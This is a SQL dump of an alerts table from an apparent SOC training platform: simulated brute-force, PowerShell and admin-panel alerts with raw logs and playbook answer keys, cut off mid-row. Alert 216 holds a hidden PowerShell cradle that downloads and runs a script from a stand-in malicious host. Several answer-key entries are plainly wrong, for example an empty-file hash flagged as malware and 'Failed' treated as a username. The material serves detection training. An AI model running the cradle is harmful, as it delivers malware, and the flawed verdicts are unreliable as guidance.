-- phpMyAdmin SQL Dump
-- version 5.2.2
-- https://www.phpmyadmin.net/
--
-- Host: localhost:3306
-- Generation Time: Mar 16, 2026 at 06:27 AM
-- Server version: 10.6.24-MariaDB-cll-lve
-- PHP Version: 8.3.30

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Database: `infosecl_platform`
--

-- --------------------------------------------------------

--
-- Table structure for table `alerts`
--

CREATE TABLE `alerts` (
  `id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL,
  `severity` enum('low','medium','high','critical') NOT NULL,
  `source` varchar(255) DEFAULT NULL,
  `details` text DEFAULT NULL,
  `alert_type` varchar(100) DEFAULT NULL,
  `mitre_technique` varchar(100) DEFAULT NULL,
  `real_world_example` tinyint(1) DEFAULT 0,
  `status` varchar(50) DEFAULT 'new',
  `assigned_to` int(11) DEFAULT NULL,
  `raw_log` text DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `playbook_solution` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,
  `difficulty` varchar(50) DEFAULT 'Beginner',
  `path_code` varchar(20) DEFAULT NULL,
  `min_level` int(11) DEFAULT 1,
  `is_ai_generated` tinyint(1) DEFAULT 0,
  `sector_code` varchar(50) DEFAULT NULL,
  `created_by` int(11) DEFAULT NULL,
  `organization_id` int(11) DEFAULT NULL,
  `simulation_data` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,
  `is_archived` tinyint(1) DEFAULT 0
) ;

--
-- Dumping data for table `alerts`
--

INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(166, 'Unauthorized Access Attempt Detected on Company Database', 'high', 'AWS CloudTrail', 'A suspicious login attempt was detected on the company\'s AWS RDS instance, likely indicating a brute force attack. Attackers often attempt multiple logins in a short period of time to guess passwords. Example citation: The 2017 MongoDB ransom attacks where attackers accessed databases using weak passwords.', 'Brute Force', 'T1110', 1, 'investigating', 44, '{\"eventVersion\":\"1.07\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AWS:123456789012:user/JohnDoe\",\"arn\":\"arn:aws:iam::123456789012:user/UnauthorizedAccessUser\",\"accountId\":\"123456789012\",\"userName\":\"UnauthorizedAccessUser\"},\"eventTime\":\"2023-11-06T19:37:18Z\",\"eventSource\":\"rds.amazonaws.com\",\"eventName\":\"LoginAttempt\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"203.0.113.42\",\"userAgent\":\"aws-sdk-java/1.11.792 Linux/5.4.0-1029-aws OpenJDK_64-Bit_Server_VM/11.0.10+9-LTS java/11.0.10\",\"requestParameters\":{\"dBInstanceIdentifier\":\"companydb\",\"masterUserName\":\"admin\"},\"responseElements\":null,\"additionalEventData\":{\"LoginStatus\":\"Failed\",\"FailureReason\":\"IncorrectPassword\"},\"requestID\":\"cd06a8b5-73e4-11e6-8b77-6b1937429304\",\"eventID\":\"1ae7e6c5-d901-4e48-b333-bb2d555766ef\",\"readOnly\":false,\"resources\":[{\"ARN\":\"arn:aws:rds:us-west-2:123456789012:db:companydb\",\"accountId\":\"123456789012\",\"type\":\"AWS::RDS::DBInstance\"}],\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}', '2025-12-27 15:57:46', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.42 reported 211 times for malicious activity. Abuse confidence score: 99%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"123456789012\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"UnauthorizedAccessUser\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"Failed\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_6\",\"type\":\"geolocation\",\"value\":\"us-west-2\",\"is_critical\":false,\"osint_result\":{\"source\":\"GeoIP Lookup\",\"verdict\":\"suspicious\",\"details\":\"Login from us-west-2 - unusual location for this user\'s typical access pattern.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'CLOUD', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.798Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.07\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AWS:123456789012:user/JohnDoe\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/UnauthorizedAccessUser\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"UnauthorizedAccessUser\\\"},\\\"eventTime\\\":\\\"2023-11-06T19:37:18Z\\\",\\\"eventSource\\\":\\\"rds.amazonaws.com\\\",\\\"eventName\\\":\\\"LoginAttempt\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"203.0.113.42\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.792 Linux/5.4.0-1029-aws OpenJDK_64-Bit_Server_VM/11.0.10+9-LTS java/11.0.10\\\",\\\"requestParameters\\\":{\\\"dBInstanceIdentifier\\\":\\\"companydb\\\",\\\"masterUserName\\\":\\\"admin\\\"},\\\"responseElements\\\":null,\\\"additionalEventData\\\":{\\\"LoginStatus\\\":\\\"Failed\\\",\\\"FailureReason\\\":\\\"IncorrectPassword\\\"},\\\"requestID\\\":\\\"cd06a8b5-73e4-11e6-8b77-6b1937429304\\\",\\\"eventID\\\":\\\"1ae7e6c5-d901-4e48-b333-bb2d555766ef\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:rds:us-west-2:123456789012:db:companydb\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::RDS::DBInstance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.798Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.07\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AWS:123456789012:user/JohnDoe\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/UnauthorizedAccessUser\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"UnauthorizedAccessUser\\\"},\\\"eventTime\\\":\\\"2023-11-06T19:37:18Z\\\",\\\"eventSource\\\":\\\"rds.amazonaws.com\\\",\\\"eventName\\\":\\\"LoginAttempt\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"203.0.113.42\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.792 Linux/5.4.0-1029-aws OpenJDK_64-Bit_Server_VM/11.0.10+9-LTS java/11.0.10\\\",\\\"requestParameters\\\":{\\\"dBInstanceIdentifier\\\":\\\"companydb\\\",\\\"masterUserName\\\":\\\"admin\\\"},\\\"responseElements\\\":null,\\\"additionalEventData\\\":{\\\"LoginStatus\\\":\\\"Failed\\\",\\\"FailureReason\\\":\\\"IncorrectPassword\\\"},\\\"requestID\\\":\\\"cd06a8b5-73e4-11e6-8b77-6b1937429304\\\",\\\"eventID\\\":\\\"1ae7e6c5-d901-4e48-b333-bb2d555766ef\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:rds:us-west-2:123456789012:db:companydb\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::RDS::DBInstance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.798Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.07\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AWS:123456789012:user/JohnDoe\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/UnauthorizedAccessUser\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"UnauthorizedAccessUser\\\"},\\\"eventTime\\\":\\\"2023-11-06T19:37:18Z\\\",\\\"eventSource\\\":\\\"rds.amazonaws.com\\\",\\\"eventName\\\":\\\"LoginAttempt\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"203.0.113.42\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.792 Linux/5.4.0-1029-aws OpenJDK_64-Bit_Server_VM/11.0.10+9-LTS java/11.0.10\\\",\\\"requestParameters\\\":{\\\"dBInstanceIdentifier\\\":\\\"companydb\\\",\\\"masterUserName\\\":\\\"admin\\\"},\\\"responseElements\\\":null,\\\"additionalEventData\\\":{\\\"LoginStatus\\\":\\\"Failed\\\",\\\"FailureReason\\\":\\\"IncorrectPassword\\\"},\\\"requestID\\\":\\\"cd06a8b5-73e4-11e6-8b77-6b1937429304\\\",\\\"eventID\\\":\\\"1ae7e6c5-d901-4e48-b333-bb2d555766ef\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:rds:us-west-2:123456789012:db:companydb\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::RDS::DBInstance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.798Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.07\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AWS:123456789012:user/JohnDoe\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/UnauthorizedAccessUser\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"UnauthorizedAccessUser\\\"},\\\"eventTime\\\":\\\"2023-11-06T19:37:18Z\\\",\\\"eventSource\\\":\\\"rds.amazonaws.com\\\",\\\"eventName\\\":\\\"LoginAttempt\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"203.0.113.42\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.792 Linux/5.4.0-1029-aws OpenJDK_64-Bit_Server_VM/11.0.10+9-LTS java/11.0.10\\\",\\\"requestParameters\\\":{\\\"dBInstanceIdentifier\\\":\\\"companydb\\\",\\\"masterUserName\\\":\\\"admin\\\"},\\\"responseElements\\\":null,\\\"additionalEventData\\\":{\\\"LoginStatus\\\":\\\"Failed\\\",\\\"FailureReason\\\":\\\"IncorrectPassword\\\"},\\\"requestID\\\":\\\"cd06a8b5-73e4-11e6-8b77-6b1937429304\\\",\\\"eventID\\\":\\\"1ae7e6c5-d901-4e48-b333-bb2d555766ef\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:rds:us-west-2:123456789012:db:companydb\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::RDS::DBInstance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.798Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.07\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AWS:123456789012:user/JohnDoe\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/UnauthorizedAccessUser\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"UnauthorizedAccessUser\\\"},\\\"eventTime\\\":\\\"2023-11-06T19:37:18Z\\\",\\\"eventSource\\\":\\\"rds.amazonaws.com\\\",\\\"eventName\\\":\\\"LoginAttempt\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"203.0.113.42\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.792 Linux/5.4.0-1029-aws OpenJDK_64-Bit_Server_VM/11.0.10+9-LTS java/11.0.10\\\",\\\"requestParameters\\\":{\\\"dBInstanceIdentifier\\\":\\\"companydb\\\",\\\"masterUserName\\\":\\\"admin\\\"},\\\"responseElements\\\":null,\\\"additionalEventData\\\":{\\\"LoginStatus\\\":\\\"Failed\\\",\\\"FailureReason\\\":\\\"IncorrectPassword\\\"},\\\"requestID\\\":\\\"cd06a8b5-73e4-11e6-8b77-6b1937429304\\\",\\\"eventID\\\":\\\"1ae7e6c5-d901-4e48-b333-bb2d555766ef\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:rds:us-west-2:123456789012:db:companydb\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::RDS::DBInstance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(216, 'Suspicious PowerShell Execution Detected', 'high', 'process', 'A potentially malicious PowerShell script execution was detected. The script attempted to bypass execution policies and downloaded dangerous payloads.', 'exec_anomaly', 'T1059.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-29T14:32:45Z\",\"host\":\"workstation123.company.local\",\"user\":{\"username\":\"jdoe\",\"domain\":\"company\"},\"process\":{\"name\":\"powershell.exe\",\"pid\":3489,\"cmdline\":\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.example.com/payload.ps1\')\",\"file_hash\":{\"sha256\":\"d41d8cd98f00b204e9800998ecf8427e\"}},\"network\":{\"src_ip\":\"192.168.1.105\",\"dest_ip\":\"198.51.100.22\"},\"alert_triggered\":true,\"tags\":[\"scripting\",\"execution_policy_bypass\"]}', '2025-12-23 05:51:29', '2026-02-15 08:29:35', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.105 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 198.51.100.22 reported 599 times for malicious activity. Abuse confidence score: 94%.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"workstation123.company.local\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"50/94 security vendors flagged this domain as malicious.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"60/72 security vendors identified this file as malware.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"High/Critical severity level; Alert type indicates malware/C2 activity; Alert type indicates suspicious script execution\"}', 'Advanced', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(217, 'Suspicious Remote Login Attempt Detected', 'high', 'Windows Security Log', 'A remote login attempt was detected from a suspicious IP address. This matches known brute force attack patterns. Refer to CVE-2019-0708 for similar incidents of brute forcing over remote desktop services.', 'Brute Force', 'T1110', 1, 'Closed', 225, '{\"ProviderName\":\"Microsoft-Windows-Security-Auditing\",\"EventID\":4625,\"Level\":\"Warning\",\"Category\":\"Logon\",\"TimeCreated\":\"2023-10-05T21:34:22Z\",\"EventRecordID\":87654321,\"RemoteIP\":\"203.0.113.45\",\"User\":\"NotAvailable\",\"WorkstationName\":\"RDP-SERVER\",\"FailureReason\":\"Unknown user name or bad password\",\"LogonType\":3,\"LogonProcessName\":\"Advapi\",\"AuthenticationPackageName\":\"Negotiate\",\"ServiceName\":\"RDP/RDGateway\",\"ProcessID\":680,\"SubStatus\":\"0xC000006A\",\"NetworkAccountName\":\"Guest\",\"NetworkAccountDomain\":\"LOCAL\",\"WorkstationUniqueId\":\"uuid-123e4567-e89b-12d3-a456-426614174000\"}', '2026-01-06 12:54:13', '2026-03-07 11:54:10', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.45 reported 165 times for malicious activity. Abuse confidence score: 76%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"NotAvailable\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"Guest\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"LOCAL\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.810Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. Failure Reason: Unknown user name or bad password.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"EventID\\\":4625,\\\"Level\\\":\\\"Warning\\\",\\\"Category\\\":\\\"Logon\\\",\\\"TimeCreated\\\":\\\"2023-10-05T21:34:22Z\\\",\\\"EventRecordID\\\":87654321,\\\"RemoteIP\\\":\\\"203.0.113.45\\\",\\\"User\\\":\\\"NotAvailable\\\",\\\"WorkstationName\\\":\\\"RDP-SERVER\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password\\\",\\\"LogonType\\\":3,\\\"LogonProcessName\\\":\\\"Advapi\\\",\\\"AuthenticationPackageName\\\":\\\"Negotiate\\\",\\\"ServiceName\\\":\\\"RDP/RDGateway\\\",\\\"ProcessID\\\":680,\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"NetworkAccountName\\\":\\\"Guest\\\",\\\"NetworkAccountDomain\\\":\\\"LOCAL\\\",\\\"WorkstationUniqueId\\\":\\\"uuid-123e4567-e89b-12d3-a456-426614174000\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.810Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. Failure Reason: Unknown user name or bad password. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"EventID\\\":4625,\\\"Level\\\":\\\"Warning\\\",\\\"Category\\\":\\\"Logon\\\",\\\"TimeCreated\\\":\\\"2023-10-05T21:34:22Z\\\",\\\"EventRecordID\\\":87654321,\\\"RemoteIP\\\":\\\"203.0.113.45\\\",\\\"User\\\":\\\"NotAvailable\\\",\\\"WorkstationName\\\":\\\"RDP-SERVER\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password\\\",\\\"LogonType\\\":3,\\\"LogonProcessName\\\":\\\"Advapi\\\",\\\"AuthenticationPackageName\\\":\\\"Negotiate\\\",\\\"ServiceName\\\":\\\"RDP/RDGateway\\\",\\\"ProcessID\\\":680,\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"NetworkAccountName\\\":\\\"Guest\\\",\\\"NetworkAccountDomain\\\":\\\"LOCAL\\\",\\\"WorkstationUniqueId\\\":\\\"uuid-123e4567-e89b-12d3-a456-426614174000\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.810Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. Failure Reason: Unknown user name or bad password. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"EventID\\\":4625,\\\"Level\\\":\\\"Warning\\\",\\\"Category\\\":\\\"Logon\\\",\\\"TimeCreated\\\":\\\"2023-10-05T21:34:22Z\\\",\\\"EventRecordID\\\":87654321,\\\"RemoteIP\\\":\\\"203.0.113.45\\\",\\\"User\\\":\\\"NotAvailable\\\",\\\"WorkstationName\\\":\\\"RDP-SERVER\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password\\\",\\\"LogonType\\\":3,\\\"LogonProcessName\\\":\\\"Advapi\\\",\\\"AuthenticationPackageName\\\":\\\"Negotiate\\\",\\\"ServiceName\\\":\\\"RDP/RDGateway\\\",\\\"ProcessID\\\":680,\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"NetworkAccountName\\\":\\\"Guest\\\",\\\"NetworkAccountDomain\\\":\\\"LOCAL\\\",\\\"WorkstationUniqueId\\\":\\\"uuid-123e4567-e89b-12d3-a456-426614174000\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.810Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. Failure Reason: Unknown user name or bad password. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"EventID\\\":4625,\\\"Level\\\":\\\"Warning\\\",\\\"Category\\\":\\\"Logon\\\",\\\"TimeCreated\\\":\\\"2023-10-05T21:34:22Z\\\",\\\"EventRecordID\\\":87654321,\\\"RemoteIP\\\":\\\"203.0.113.45\\\",\\\"User\\\":\\\"NotAvailable\\\",\\\"WorkstationName\\\":\\\"RDP-SERVER\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password\\\",\\\"LogonType\\\":3,\\\"LogonProcessName\\\":\\\"Advapi\\\",\\\"AuthenticationPackageName\\\":\\\"Negotiate\\\",\\\"ServiceName\\\":\\\"RDP/RDGateway\\\",\\\"ProcessID\\\":680,\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"NetworkAccountName\\\":\\\"Guest\\\",\\\"NetworkAccountDomain\\\":\\\"LOCAL\\\",\\\"WorkstationUniqueId\\\":\\\"uuid-123e4567-e89b-12d3-a456-426614174000\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.810Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. Failure Reason: Unknown user name or bad password. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"EventID\\\":4625,\\\"Level\\\":\\\"Warning\\\",\\\"Category\\\":\\\"Logon\\\",\\\"TimeCreated\\\":\\\"2023-10-05T21:34:22Z\\\",\\\"EventRecordID\\\":87654321,\\\"RemoteIP\\\":\\\"203.0.113.45\\\",\\\"User\\\":\\\"NotAvailable\\\",\\\"WorkstationName\\\":\\\"RDP-SERVER\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password\\\",\\\"LogonType\\\":3,\\\"LogonProcessName\\\":\\\"Advapi\\\",\\\"AuthenticationPackageName\\\":\\\"Negotiate\\\",\\\"ServiceName\\\":\\\"RDP/RDGateway\\\",\\\"ProcessID\\\":680,\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"NetworkAccountName\\\":\\\"Guest\\\",\\\"NetworkAccountDomain\\\":\\\"LOCAL\\\",\\\"WorkstationUniqueId\\\":\\\"uuid-123e4567-e89b-12d3-a456-426614174000\\\"}\"}],\"query\":\"index=main source=\\\"Security\\\" | head 100\"}}', 0),
(218, 'Unauthorized Access to Admin Panel', 'high', 'web_application', 'A user attempted to access the admin panel without appropriate credentials.', 'unauthorized_access', 'T1078.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T15:34:59Z\",\"event_id\":\"WEB-302\",\"user_id\":\"guest_user\",\"ip_address\":\"192.168.1.100\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\",\"request_method\":\"POST\",\"requested_url\":\"/admin\",\"response_code\":403,\"message\":\"Access denied. User lacks permission for admin panel access.\"}', '2025-12-24 08:36:25', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.100 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"guest_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active 